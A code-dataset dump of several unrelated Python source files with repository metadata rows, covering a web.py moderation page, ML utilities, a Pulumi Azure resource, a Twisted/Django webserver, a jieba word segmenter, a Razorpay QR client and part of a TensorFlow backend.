class PageModerate:
def GET(self, rid=None):
if not tplib.is_mod(sess): raise web.seeother('/')
if rid is not None:
rid = int(rid)
query = """
insert into fail_bots (hash, code) select md5($code), $code where
not exists (select 1 from fail_bots where hash = md5($code))
"""
robots = db.select('robots', what='compiled_code', where='id=$id',
vars={'id': rid})
if robots:
code = robots[0]['compiled_code']
db.query(query, vars={'code': code})
db.update('robots', where='id=$id', vars={'id': rid},
passed=False, disabled=True)
raise web.ok
robots = db.select('robots', what='id, rating, compiled_code',
where='''passed and compiled and not disabled and
rating is not NULL and rating < 300 and
not automatch and last_updated
< extract(epoch from now()) - 60 * 60 * 24 * 7''',
order='rating asc')
maximum = int(web.input(maximum=100000).maximum)
return ltpl('moderate', robots, maximum)
class PageUpdatePrefs(object):
def GET(self):
params = web.input(show_actions=None, show_grid=None)
if params.show_actions is not None:
sess.show_actions = True if params.show_actions=='yes' else False
if params.show_grid is not None:
sess.show_grid = True if params.show_grid=='yes' else False
return web.ok
MAX_RETRIES = 10
application = app.wsgifunc()
if __name__ == '__main__':
app.run()
| 33.928475
| 108
| 0.538384
|
5f3d0992e153e04bf904f0104f25958ef43073aa
| 1,547
|
py
|
Python
|
src/worker/utils.py
|
hwang595/Draco
|
8472912cce82e6d74087a402fd417e7a837517ab
|
[
"MIT"
] | 21
|
2018-09-19T06:30:57.000Z
|
2022-03-25T22:44:39.000Z
|
src/worker/utils.py
|
hwang595/Draco
|
8472912cce82e6d74087a402fd417e7a837517ab
|
[
"MIT"
] | 3
|
2018-12-31T05:44:22.000Z
|
2021-09-09T15:59:46.000Z
|
src/worker/utils.py
|
hwang595/Draco
|
8472912cce82e6d74087a402fd417e7a837517ab
|
[
"MIT"
] | 12
|
2018-09-19T06:30:59.000Z
|
2021-12-13T09:53:54.000Z
|
from __future__ import print_function
from mpi4py import MPI
import numpy as np
import sys
sys.path.append("..")
from nn_ops import NN_Trainer
from compress_gradient import compress
from datasets.utils import get_batch
from util import *
import torch
from torch.autograd import Variable
import time
from datetime import datetime
import copy
from sys import getsizeof
STEP_START_ = 1
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
class ModelBuffer(object):
def __init__(self, network):
"""
this class is used to save model weights received from parameter server
current step for each layer of model will also be updated here to make sure
the model is always up-to-date
"""
self.recv_buf = []
self.layer_cur_step = []
# consider we don't want to update the param of `BatchNorm` layer right now
# we temporirially deprecate the foregoing version and only update the model
# parameters
for param_idx, param in enumerate(network.parameters()):
self.recv_buf.append(np.zeros(param.size()))
self.layer_cur_step.append(0)
| 30.333333
| 84
| 0.681319
|
db132ebb9b1c1e907b1cd264c4199e336c7c4d95
| 6,502
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/network/v20200501/virtual_hub_bgp_connection.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/network/v20200501/virtual_hub_bgp_connection.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/network/v20200501/virtual_hub_bgp_connection.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = ['VirtualHubBgpConnection']
class VirtualHubBgpConnection(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
connection_name: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
peer_asn: Optional[pulumi.Input[int]] = None,
peer_ip: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
virtual_hub_name: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Virtual Appliance Site resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] connection_name: The name of the connection.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: Name of the connection.
:param pulumi.Input[int] peer_asn: Peer ASN.
:param pulumi.Input[str] peer_ip: Peer IP.
:param pulumi.Input[str] resource_group_name: The resource group name of the VirtualHub.
:param pulumi.Input[str] virtual_hub_name: The name of the VirtualHub.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if connection_name is None:
raise TypeError("Missing required property 'connection_name'")
__props__['connection_name'] = connection_name
__props__['id'] = id
__props__['name'] = name
__props__['peer_asn'] = peer_asn
__props__['peer_ip'] = peer_ip
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if virtual_hub_name is None:
raise TypeError("Missing required property 'virtual_hub_name'")
__props__['virtual_hub_name'] = virtual_hub_name
__props__['connection_state'] = None
__props__['etag'] = None
__props__['provisioning_state'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:VirtualHubBgpConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200601:VirtualHubBgpConnection"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VirtualHubBgpConnection")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualHubBgpConnection, __self__).__init__(
'azure-nextgen:network/v20200501:VirtualHubBgpConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualHubBgpConnection':
"""
Get an existing VirtualHubBgpConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return VirtualHubBgpConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="connectionState")
def connection_state(self) -> pulumi.Output[str]:
"""
The current state of the VirtualHub to Peer.
"""
return pulumi.get(self, "connection_state")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
Name of the connection.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="peerAsn")
def peer_asn(self) -> pulumi.Output[Optional[int]]:
"""
Peer ASN.
"""
return pulumi.get(self, "peer_asn")
@property
@pulumi.getter(name="peerIp")
def peer_ip(self) -> pulumi.Output[Optional[str]]:
"""
Peer IP.
"""
return pulumi.get(self, "peer_ip")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Connection type.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 39.889571
| 287
| 0.63319
|
277cc02c2f80eb0206763fcc047ac15c5858bb7f
| 259
|
py
|
Python
|
mmdet/core/utils/__init__.py
|
yizhe-ang/MMSceneGraph
|
d4daec3d7930d6fe1efe75b9c0a265c8be0b70ba
|
[
"MIT"
] | 24
|
2021-10-14T03:28:28.000Z
|
2022-03-29T09:30:04.000Z
|
mmdet/core/utils/__init__.py
|
yizhe-ang/MMSceneGraph
|
d4daec3d7930d6fe1efe75b9c0a265c8be0b70ba
|
[
"MIT"
] | 4
|
2021-12-14T15:04:49.000Z
|
2022-02-19T09:54:42.000Z
|
mmdet/core/utils/__init__.py
|
yizhe-ang/MMSceneGraph
|
d4daec3d7930d6fe1efe75b9c0a265c8be0b70ba
|
[
"MIT"
] | 4
|
2021-10-31T11:23:06.000Z
|
2021-12-17T06:38:50.000Z
|
from .dist_utils import DistOptimizerHook, allreduce_grads
from .misc import multi_apply, tensor2imgs, unmap, enumerate_by_image
__all__ = [
'allreduce_grads', 'DistOptimizerHook', 'tensor2imgs', 'unmap',
'multi_apply', 'enumerate_by_image'
]
| 32.375
| 70
| 0.752896
|
067d5bedca44f4f2ca349eed27fd501fa3fda654
| 8,652
|
py
|
Python
|
layers/ddcconv1d.py
|
bshishov/DeepForecasting
|
a562ed5fa39c097f8dd4f41ae65b52bf887f8f33
|
[
"MIT"
] | 4
|
2018-12-06T08:55:20.000Z
|
2020-04-11T20:30:38.000Z
|
layers/ddcconv1d.py
|
bshishov/DeepForecasting
|
a562ed5fa39c097f8dd4f41ae65b52bf887f8f33
|
[
"MIT"
] | null | null | null |
layers/ddcconv1d.py
|
bshishov/DeepForecasting
|
a562ed5fa39c097f8dd4f41ae65b52bf887f8f33
|
[
"MIT"
] | 2
|
2020-04-09T14:43:37.000Z
|
2020-08-04T22:34:13.000Z
|
import tensorflow as tf
import numpy as np
def get_shape(spec: str, spec_shape: dict):
return tuple(spec_shape[dim] for dim in spec)
def expand_transform(x, input_spec: str, output_spec: str, output_spec_shape: dict, numpy=False):
assert len(output_spec) == len(output_spec_shape)
if numpy:
tile_op = np.tile
reshape_op = np.reshape
transpose_op = np.transpose
else:
tile_op = tf.tile
reshape_op = tf.reshape
transpose_op = tf.transpose
input_spec = [dim for dim in input_spec]
output_spec = [dim for dim in output_spec]
missing_dims = [dim for dim in output_spec if dim not in input_spec]
missing_shapes = [output_spec_shape[dim] for dim in missing_dims]
missing_size = np.prod(missing_shapes)
tmp_spec = missing_dims + input_spec
transpose = [tmp_spec.index(dim) for dim in output_spec]
if len(missing_dims) > 0:
# Tile and reshape, missing dims will be first
x = tile_op(x, [missing_size] + [1] * (len(input_spec) - 1))
x = reshape_op(x, missing_shapes + [output_spec_shape[dim] for dim in input_spec])
if tmp_spec != output_spec:
x = transpose_op(x, transpose)
return x
def get_coords(kernel_indices, offsets, offset_mode: str, spec_shapes: dict):
"""
Returns float coordinates in (B, S, F, C, K) shape
kernel_indices in (S, K) shape
offsets in offset_mode (any combination of dimennsions)
"""
if offsets is None:
print('DDCC1D layer used without offsets')
return expand_transform(kernel_indices, 'SK', 'BSFCK', spec_shapes)
def _coords(_kernel_indices, _offsets):
return tf.clip_by_value(_kernel_indices + _offsets, 0, int(_kernel_indices.get_shape()[0]))
out_spec = 'BSFCK'
kernel_spec = 'SK'
if offset_mode == kernel_spec or offset_mode == 'K':
return expand_transform(_coords(kernel_indices, offsets), kernel_spec, out_spec, spec_shapes)
if offset_mode == 'S':
offsets = expand_transform(offsets, offset_mode, kernel_spec, spec_shapes)
return expand_transform(_coords(kernel_indices, offsets), kernel_spec, out_spec, spec_shapes)
if offset_mode == 'BSK':
indices = expand_transform(kernel_indices, kernel_spec, offset_mode, spec_shapes)
return expand_transform(_coords(indices, offsets), offset_mode, out_spec, spec_shapes)
if offset_mode == 'SFK':
indices = expand_transform(kernel_indices, kernel_spec, offset_mode, spec_shapes)
return expand_transform(_coords(indices, offsets), offset_mode, out_spec, spec_shapes)
# Naive (most inefficient) method
indices = expand_transform(kernel_indices, 'SK', out_spec, spec_shapes)
offsets = expand_transform(offsets, offset_mode, out_spec, spec_shapes)
return _coords(indices, offsets)
def ddcconv1d(inputs: tf.Variable,
weights: tf.Variable,
offsets: tf.Variable,
dilation_rate: int = 1,
offset_mode='F',
interpolate=True,
name: str='ddcc1d'):
"""
Deformable Dilated Causal Convolution 1D
Shape dimensions notation:
B - batch size
S - sequence len
C - input channels
K - kernel size
F - filters
:param name: name of the layer
:param inputs: Input tensor of shape (B, S, C)
:param weights: Tensor of shape (F, C, K)
:param offsets: Tensof of shape (F)
:param dilation_rate: Size of receptive field gap
:param offset_mode: offset mode any combination of dimensions, like
F - one offset per filter,
FK - offset per filter and each kernel weight
BSC - offset per every timestep of each sample
:param interpolate: Use linear interpolation or just convert indices to int32
:return: Computed 1D convolutions of shape (B, S, F)
"""
with tf.variable_scope(name):
batch_size, seq_length, channels = (int(v) for v in inputs.shape)
filters, _, kernel_size = (int(v) for v in weights.shape)
spec_shapes = {
'B': batch_size,
'S': seq_length,
'F': filters,
'C': channels,
'K': kernel_size
}
# Indices stuff
with tf.variable_scope('KernelBaseIndices'):
base_indices = np.arange(seq_length).repeat(kernel_size).reshape((-1, kernel_size))
window_indices = tf.constant(base_indices, dtype=tf.float32, name='window_indices')
receptive_field = tf.constant(np.linspace(-kernel_size + 1, 0, kernel_size) * dilation_rate,
name='receptive_field',
dtype=tf.float32)
kernel_indices = window_indices + receptive_field
with tf.variable_scope('BatchIndices'):
# Create batch indices constant in BSFCK shape
batch_indices_np = expand_transform(np.arange(batch_size, dtype=np.int32), 'B', 'BSFCK', spec_shapes, numpy=True)
batch_indices = tf.constant(batch_indices_np, dtype=tf.int32, name='batch_indices')
with tf.variable_scope('ChannelIndices'):
# Create channel indices constant in BSFCK shape
channel_indices_np = expand_transform(np.arange(channels, dtype=np.int32), 'C', 'BSFCK', spec_shapes, numpy=True)
channel_indices = tf.constant(channel_indices_np, dtype=tf.int32, name='channel_indices')
with tf.variable_scope('Sampling'):
# SAMPLING IS EXTREMELY EXPENSIVE!!!!!
coords = get_coords(kernel_indices, offsets, offset_mode=offset_mode, spec_shapes=spec_shapes)
if interpolate:
# Left and right indices, e.g. index of 3.65 would be 3 on the left and 4 on the right
indices_left = tf.cast(tf.floor(coords), tf.int32)
indices_right = tf.cast(tf.ceil(coords), tf.int32)
# Calculate interpolation, for index 3.65 interpolation factor would be 0.65
interpolation = coords - tf.cast(indices_left, tf.float32)
# Sample both values (on the lef and right)
# Sample input of shape BSC with BSFCK3 indices (produced by stack) -> BSFCK for each side (left and right)
vals_left = tf.gather_nd(inputs, tf.stack((batch_indices, indices_left, channel_indices), axis=-1))
vals_right = tf.gather_nd(inputs, tf.stack((batch_indices, indices_right, channel_indices), axis=-1))
# Interpolated values
samples = vals_left + (vals_right - vals_left) * interpolation
else:
batch_idx = tf.stack((batch_indices, tf.cast(tf.floor(coords), tf.int32), channel_indices), axis=-1)
samples = tf.gather_nd(inputs, batch_idx)
with tf.variable_scope('Convolution'):
# Apply weights: BSFCK * FCK = BSFCK
conv = samples * weights
# Sum across kernel: BSFCK -> BSFC
conv = tf.reduce_sum(conv, axis=-1)
# Sum across channels: BSFC -> BSF
conv = tf.reduce_sum(conv, axis=-1)
return conv
def _transform_test():
x = np.arange(10)
spec_shape = {'B': len(x), 'T': 3, 'C': 2}
outputs = ['BTC', 'BCT', 'TBC', 'TCB', 'CBT', 'CTB']
for output_spec in outputs:
print(output_spec)
print(expand_transform(x, 'B', output_spec, spec_shape, numpy=True))
print('\n\n')
def _conv_test():
def print_var(v):
print("{0}: {1}:\n\t{2}".format(v.name, v.shape, v.eval()))
# shape: (batch_size, sequence_len, channels)
x_raw = np.array([
[[0, 0], [1, 1], [2, 2], [3, 3], [4, 4]],
[[1, 1], [2, 2], [3, 3], [4, 4], [5, 5]],
[[2, 2], [3, 3], [4, 4], [5, 5], [6, 6]],
])
# Filters: FCK shape
filter_weights_raw = np.array([
[[1], [0]]
])
# Filter offsets: F shape
filter_offsets_raw = np.ones(filter_weights_raw.shape[0]) * 0.5
x = tf.Variable(x_raw, name='x', dtype=tf.float32, trainable=False)
filter_weights = tf.Variable(filter_weights_raw, name='filter_weights', dtype=tf.float32)
filter_offsets = tf.Variable(filter_offsets_raw, name='filter_offsets', dtype=tf.float32)
y = ddcconv1d(x, weights=filter_weights, offsets=filter_offsets, offset_mode='F')
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print_var(x)
print_var(filter_offsets)
print_var(filter_weights)
print_var(y)
def main():
#_transform_test()
_conv_test()
if __name__ == '__main__':
main()
| 39.506849
| 125
| 0.633264
|
defde838be23a116f4b1b8302697347554ee7744
| 4,115
|
py
|
Python
|
src/server/webserver.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 5
|
2015-01-30T08:47:59.000Z
|
2022-01-22T19:27:03.000Z
|
src/server/webserver.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 2
|
2017-12-28T21:36:48.000Z
|
2017-12-28T21:36:57.000Z
|
src/server/webserver.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 1
|
2019-01-05T15:51:37.000Z
|
2019-01-05T15:51:37.000Z
|
"""
This implements resources for twisted webservers using the wsgi
interface of django. This alleviates the need of running e.g. an
apache server to serve Evennia's web presence (although you could do
that too if desired).
The actual servers are started inside server.py as part of the Evennia
application.
(Lots of thanks to http://githup.com/clemensha/twisted-wsgi-django for
a great example/aid on how to do this.)
"""
import urlparse
from urllib import quote as urlquote
from twisted.web import resource, http
from twisted.internet import reactor
from twisted.application import internet
from twisted.web.proxy import ReverseProxyResource
from twisted.web.server import NOT_DONE_YET
from twisted.web.wsgi import WSGIResource
from django.core.handlers.wsgi import WSGIHandler
from settings import UPSTREAM_IPS
#
# X-Forwarded-For Handler
#
class HTTPChannelWithXForwardedFor(http.HTTPChannel):
def allHeadersReceived(self):
"""
Check to see if this is a reverse proxied connection.
"""
CLIENT = 0
http.HTTPChannel.allHeadersReceived(self)
req = self.requests[-1]
client_ip, port = self.transport.client
proxy_chain = req.getHeader('X-FORWARDED-FOR')
if proxy_chain and client_ip in UPSTREAM_IPS:
forwarded = proxy_chain.split(', ', 1)[CLIENT]
self.transport.client = (forwarded, port)
# Monkey-patch Twisted to handle X-Forwarded-For.
http.HTTPFactory.protocol = HTTPChannelWithXForwardedFor
class EvenniaReverseProxyResource(ReverseProxyResource):
def getChild(self, path, request):
"""
Create and return a proxy resource with the same proxy configuration
as this one, except that its path also contains the segment given by
C{path} at the end.
"""
return EvenniaReverseProxyResource(
self.host, self.port, self.path + '/' + urlquote(path, safe=""),
self.reactor)
def render(self, request):
"""
Render a request by forwarding it to the proxied server.
"""
# RFC 2616 tells us that we can omit the port if it's the default port,
# but we have to provide it otherwise
request.content.seek(0, 0)
qs = urlparse.urlparse(request.uri)[4]
if qs:
rest = self.path + '?' + qs
else:
rest = self.path
clientFactory = self.proxyClientFactoryClass(
request.method, rest, request.clientproto,
request.getAllHeaders(), request.content.read(), request)
self.reactor.connectTCP(self.host, self.port, clientFactory)
return NOT_DONE_YET
#
# Website server resource
#
class DjangoWebRoot(resource.Resource):
"""
This creates a web root (/) that Django
understands by tweaking the way the
child instancee are recognized.
"""
def __init__(self, pool):
"""
Setup the django+twisted resource
"""
resource.Resource.__init__(self)
self.wsgi_resource = WSGIResource(reactor, pool, WSGIHandler())
def getChild(self, path, request):
"""
To make things work we nudge the
url tree to make this the root.
"""
path0 = request.prepath.pop(0)
request.postpath.insert(0, path0)
return self.wsgi_resource
#
# Threaded Webserver
#
class WSGIWebServer(internet.TCPServer):
"""
This is a WSGI webserver. It makes sure to start
the threadpool after the service itself started,
so as to register correctly with the twisted daemon.
call with WSGIWebServer(threadpool, port, wsgi_resource)
"""
def __init__(self, pool, *args, **kwargs):
"This just stores the threadpool"
self.pool = pool
internet.TCPServer.__init__(self, *args, **kwargs)
def startService(self):
"Start the pool after the service"
internet.TCPServer.startService(self)
self.pool.start()
def stopService(self):
"Safely stop the pool after service stop."
internet.TCPServer.stopService(self)
self.pool.stop()
| 30.481481
| 79
| 0.672175
|
6c865e0def5bd37609acc97b0f4a3dded8b9e0b1
| 4,736
|
py
|
Python
|
data/jd/segment_word.py
|
zhangxiangxiao/Glyph
|
df6ef326215657a2f76c4c6fb469ff85760a9afa
|
[
"BSD-3-Clause"
] | 165
|
2017-09-01T07:54:04.000Z
|
2022-03-28T18:59:03.000Z
|
data/jd/segment_word.py
|
zhangxiangxiao/Glyph
|
df6ef326215657a2f76c4c6fb469ff85760a9afa
|
[
"BSD-3-Clause"
] | 3
|
2019-04-27T10:25:51.000Z
|
2019-05-13T13:49:17.000Z
|
data/jd/segment_word.py
|
zhangxiangxiao/Glyph
|
df6ef326215657a2f76c4c6fb469ff85760a9afa
|
[
"BSD-3-Clause"
] | 38
|
2017-12-28T01:09:54.000Z
|
2021-09-09T08:10:04.000Z
|
#!/usr/bin/python3
'''
Convert Chinese datasets to Index of Words
Copyright 2016 Xiang Zhang
Usage: python3 segment_word.py -i [input] -l [list] -o [output] [-r]
'''
#Input file
INPUT = '../data/dianping/train.csv'
#Output file
OUTPUT = '../data/dianping/train_word.csv'
# List file
LIST = '../data/dianping/train_word_list.csv'
# Read already defined word list
READ = False
import argparse
import csv
import jieba
# Main program
def main():
global INPUT
global OUTPUT
global LIST
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', help = 'Input file', default = INPUT)
parser.add_argument(
'-o', '--output', help = 'Output file', default = OUTPUT)
parser.add_argument('-l', '--list', help = 'Word list file', default = LIST)
parser.add_argument(
'-r', '--read', help = 'Read from list file', action = 'store_true')
args = parser.parse_args()
INPUT = args.input
OUTPUT = args.output
LIST = args.list
READ = args.read
if READ:
print('Reading word index')
word_index = readWords()
else:
print('Counting words')
word_count, word_freq = segmentWords()
print('Sorting words by count')
word_index = sortWords(word_count, word_freq)
print('Constructing word index output')
convertWords(word_index)
# Read from pre-existing word list
def readWords():
# Open the files
ifd = open(LIST, encoding = 'utf-8', newline = '')
reader = csv.reader(ifd, quoting = csv.QUOTE_ALL)
# Loop over the csv rows
word_index = dict()
n = 0
for row in reader:
word = row[0].replace('\\n', '\n')
word_index[word] = n + 1
n = n + 1
if n % 1000 == 0:
print('\rProcessing line: {}'.format(n), end = '')
print('\rProcessed lines: {}'.format(n))
return word_index
# Segment the text in Chinese
def segmentWords():
# Open the files
ifd = open(INPUT, encoding = 'utf-8', newline = '')
reader = csv.reader(ifd, quoting = csv.QUOTE_ALL)
# Loop over the csv rows
word_count = dict()
word_freq = dict()
n = 0
for row in reader:
field_set = set()
for i in range(1, len(row)):
field = row[i].replace('\\n', '\n')
field_list = jieba.cut(field)
for word in field_list:
word_count[word] = word_count.get(word, 0) + 1
if word not in field_set:
field_set.add(word)
word_freq[word] = word_freq.get(word, 0) + 1
n = n + 1
if n % 1000 == 0:
print('\rProcessing line: {}'.format(n), end = '')
print('\rProcessed lines: {}'.format(n))
ifd.close()
# Normalizing word frequency
for word in word_freq:
word_freq[word] = float(word_freq[word]) / float(n)
return word_count, word_freq
# Sort words for a given count dictionary object
def sortWords(word_count, word_freq):
# Sort the words
word_list = sorted(
word_count, key = lambda word: word_count[word], reverse = True)
# Open the files
ofd = open(LIST, 'w', encoding = 'utf-8', newline = '')
writer = csv.writer(ofd, quoting = csv.QUOTE_ALL, lineterminator = '\n')
# Loop over all the words
word_index = dict()
n = 0
for i in range(len(word_list)):
word = word_list[i]
row = [word.replace('\n', '\\n'), str(word_count[word]),
str(word_freq[word])]
writer.writerow(row)
word_index[word] = i + 1
n = n + 1
if n % 1000 == 0:
print('\rProcessing word: {}'.format(n), end = '')
print('\rProcessed words: {}'.format(n))
ofd.close()
return word_index
# Convert the text in Chinese to word list
def convertWords(word_index):
# Open the files
ifd = open(INPUT, encoding = 'utf-8', newline = '')
ofd = open(OUTPUT, 'w', encoding = 'utf-8', newline = '')
reader = csv.reader(ifd, quoting = csv.QUOTE_ALL)
writer = csv.writer(ofd, quoting = csv.QUOTE_ALL, lineterminator = '\n')
# Loop over the csv rows
n = 0
for row in reader:
new_row = list()
new_row.append(row[0])
for i in range(1, len(row)):
field = row[i].replace('\\n', '\n')
field_list = jieba.cut(field)
new_row.append(' '.join(map(
str, map(lambda word: word_index.get(word, len(word_index) + 1),
field_list))))
writer.writerow(new_row)
n = n + 1
if n % 1000 == 0:
print('\rProcessing line: {}'.format(n), end = '')
print('\rProcessed lines: {}'.format(n))
ifd.close()
ofd.close()
if __name__ == '__main__':
main()
| 30.954248
| 80
| 0.580025
|
71150cf4c906c9fc1dc521163905b34298258d5b
| 1,503
|
py
|
Python
|
razorpay/resources/qrcode.py
|
captn3m0/razorpay
|
0352f2d81696984c96e51c55a81178c663be320f
|
[
"MIT"
] | 3
|
2015-11-18T10:28:07.000Z
|
2015-11-21T01:17:35.000Z
|
razorpay/resources/qrcode.py
|
captn3m0/razorpay
|
0352f2d81696984c96e51c55a81178c663be320f
|
[
"MIT"
] | null | null | null |
razorpay/resources/qrcode.py
|
captn3m0/razorpay
|
0352f2d81696984c96e51c55a81178c663be320f
|
[
"MIT"
] | null | null | null |
from .base import Resource
from ..constants.url import URL
class Qrcode(Resource):
def __init__(self, client=None):
super(Qrcode, self).__init__(client)
self.base_url = URL.QRCODE_URL
def fetch(self, qrcode_id, data={}, **kwargs):
""""
Fetch a Qr code
Args:
customer_id : Id for which customer object has to be retrieved
Returns:
Qrcode dict for given qrcode id
"""
return super(Qrcode, self).fetch(qrcode_id, data, **kwargs)
def create(self, data={}, **kwargs):
""""
Create a QR Code
Returns:
QrCode Dict which was created
"""
url = self.base_url
return self.post_url(url, data, **kwargs)
def all(self, data={}, **kwargs):
""""
Fetch All Qr Code
Returns:
Qrcode dict
"""
return super(Qrcode, self).all(data, **kwargs)
def fetch_all_payments(self, qrcode_id, data={}, **kwargs):
""""
Fetch Payments for a QR Code
Returns:
Qrcode payment dict
"""
url = "{}/{}/payments".format(self.base_url, qrcode_id)
return self.get_url(url, data, **kwargs)
def close(self, qrcode_id, **kwargs):
""""
Close a QR Code
Returns:
Qrcode Dict which was closed
"""
url = '{}/{}/close'.format(self.base_url, qrcode_id)
return self.post_url(url, {}, **kwargs)
| 24.639344
| 74
| 0.539587
|
8b4e72a1dd06b62062ace0671bf05beef7def8a1
| 14,349
|
py
|
Python
|
tensornetwork/backends/tensorflow/tensorflow_backend.py
|
jeff-bezos-amazon/TensorNetwork
|
79337eeb4d0accf263a3bbc27e16de0d6be547df
|
[
"Apache-2.0"
] | null | null | null |
tensornetwork/backends/tensorflow/tensorflow_backend.py
|
jeff-bezos-amazon/TensorNetwork
|
79337eeb4d0accf263a3bbc27e16de0d6be547df
|
[
"Apache-2.0"
] | null | null | null |
tensornetwork/backends/tensorflow/tensorflow_backend.py
|
jeff-bezos-amazon/TensorNetwork
|
79337eeb4d0accf263a3bbc27e16de0d6be547df
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The TensorNetwork Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#pylint: disable=line-too-long
from typing import Optional, Any, Sequence, Tuple, Type, Callable, List, Text
from tensornetwork.backends import abstract_backend
from tensornetwork.backends.tensorflow import decompositions
from tensornetwork.backends.tensorflow import tensordot2
# This might seem bad, but pytype treats tf.Tensor as Any anyway, so
# we don't actually lose anything by doing this.
import numpy as np
Tensor = Any
#pylint: disable=abstract-method
class TensorFlowBackend(abstract_backend.AbstractBackend):
"""See base_backend.BaseBackend for documentation."""
def __init__(self) -> None:
# pylint: disable=global-variable-undefined
global tf
super(TensorFlowBackend, self).__init__()
try:
#pylint: disable=import-outside-toplevel
import tensorflow
except ImportError:
raise ImportError("Tensorflow not installed, please switch to a "
"different backend or install Tensorflow.")
tf = tensorflow
self.name = "tensorflow"
def tensordot(self, a: Tensor, b: Tensor,
axes: Sequence[Sequence[int]]) -> Tensor:
return tensordot2.tensordot(tf, a, b, axes)
def reshape(self, tensor: Tensor, shape: Tensor) -> Tensor:
return tf.reshape(tensor, shape)
def transpose(self, tensor, perm) -> Tensor:
return tf.transpose(tensor, perm)
def slice(self, tensor: Tensor, start_indices: Tuple[int, ...],
slice_sizes: Tuple[int, ...]) -> Tensor:
if len(start_indices) != len(slice_sizes):
raise ValueError("Lengths of start_indices and slice_sizes must be"
"identical.")
return tf.slice(tensor, start_indices, slice_sizes)
def svd(
self,
tensor: Tensor,
pivot_axis: int = -1,
max_singular_values: Optional[int] = None,
max_truncation_error: Optional[float] = None,
relative: Optional[bool] = False
) -> Tuple[Tensor, Tensor, Tensor, Tensor]:
return decompositions.svd(
tf,
tensor,
pivot_axis,
max_singular_values,
max_truncation_error,
relative=relative)
def qr(self, tensor: Tensor, pivot_axis: int = -1,
